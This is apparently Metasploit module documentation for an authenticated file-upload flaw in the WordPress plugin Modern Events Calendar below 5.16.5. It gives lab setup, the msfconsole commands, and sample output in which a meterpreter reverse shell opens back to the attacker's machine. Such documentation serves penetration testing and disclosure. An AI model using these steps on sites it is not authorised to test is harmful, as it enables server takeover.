## Vulnerable Application

### Description

This module allows an attacker with a privileged Wordpress account to launch a reverse shell
due to an arbitrary file upload vulnerability in Wordpress plugin Modern Events Calendar < 5.16.5.
This is due to an incorrect check of the uploaded file extension.
By using `text/csv` content-type in a request, it is possible to upload a .php payload as is is not forbidden by the plugin.
Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/<random_payload_name>.php`

### Installation

You can easily install Wordpress with Docker as explained [there]
(https://upcloud.com/community/tutorials/wordpress-with-docker/).
Then, you can download a vulnerable version of Modern Events Calendar plugin from [there]
(https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip)
and install it on your Wordpress website through the plugin page : Add New > Upload Plugin > Browse...

## Verification Steps

1. Start `msfconsole`
2. `use exploit/multi/http/wp_plugin_modern_events_calendar_rce`
3. `set USERNAME <admin_username>`
4. `set PASSWORD <admin_password>`
5. `set TARGETURI <base_path_wordpress>` if the base path of the Wordpress website is different from `/`
6. `check` to check if the targeted Wordpress website is vulnerable
7. `run` the module to exploit the vulnerability and start a reverse shell

## Options

### USERNAME

Set the USERNAME of your admin account.

### PASSWORD

Set the PASSWORD of your admin account.

## Scenarios

This module was successfully tested on Debian 10 with Wordpress 5.7.2 and Modern Events Calendar 5.16.2.
See the following output :

```
msf6 > use wp_plugin_modern_events_calendar_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(wp_plugin_modern_events_calendar_rce) > set rhost 192.168.1.12
rhost => 192.168.1.12
msf6 exploit(wp_plugin_modern_events_calendar_rce) > set username admin
username => admin
msf6 exploit(wp_plugin_modern_events_calendar_rce) > set password my_best_password
password => my_best_password
msf6 exploit(wp_plugin_modern_events_calendar_rce) > run

[*] Started reverse TCP handler on 192.168.1.35:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Uploading file 'wkook.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to 192.168.1.12
[*] Meterpreter session 10 opened (192.168.1.35:4444 -> 192.168.1.12:34400) at 2021-07-12 14:20:43 +0200

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo 
Computer    : 66dd7f594749
OS          : Linux 66dd7f594749 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
Meterpreter : php/linux
meterpreter > 
```
